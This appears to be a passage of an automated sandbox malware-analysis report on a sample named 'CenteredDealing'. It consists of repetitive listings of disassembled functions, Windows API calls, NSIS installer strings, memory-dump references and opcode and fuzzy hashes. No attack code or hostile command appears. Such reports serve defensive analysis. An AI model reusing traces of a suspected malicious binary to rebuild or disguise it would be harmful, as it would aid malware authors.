                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                        • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                        • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                        • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                                                                                                                                        • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                                                                                                                                                                                                                        Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                        • String ID: %02x%c$...
                                                                                                                                                                                                                                                                        • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                        • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                                                                                                                                        • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                                                                                                                                                                                                                        Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                                                                                                                                                                                                          • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                                                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                                                                                                                                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                        • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                        • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                        • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                                                                                                                                        • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                                                                                                                                                                                                                        Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                        • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                                                                                                                                                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                        • Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                                                                                                                                                                                                                        • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                                                                                                                                                                                                                        Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                          • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                                                                                                                                                                                                        • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                                                                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                        • String ID: Version
                                                                                                                                                                                                                                                                        • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                        • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                                                                                                                                        • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                                                                                                                                                                                                                        Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                        • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                        • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                                                                                                                                                        • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                                                                                                                                                                                                                        Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                        • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                                                                                                                                                        • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                                                                                                                                                                                                                        Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                        • String ID: !N~
                                                                                                                                                                                                                                                                        • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                        • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                                                                                                                                                                                        • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                                                                                                                                                                                                                        Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        • Error launching installer, xrefs: 00405C48
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                        • String ID: Error launching installer
                                                                                                                                                                                                                                                                        • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                        • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                                                                                                                                                                                        • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                                                                                                                                                                                                                        Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                          • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                        • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                        • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                                                                                                                                                                                        • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                                                                                                                                                                                                                        Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                                                                                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                                                                                                                                                                                                        • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
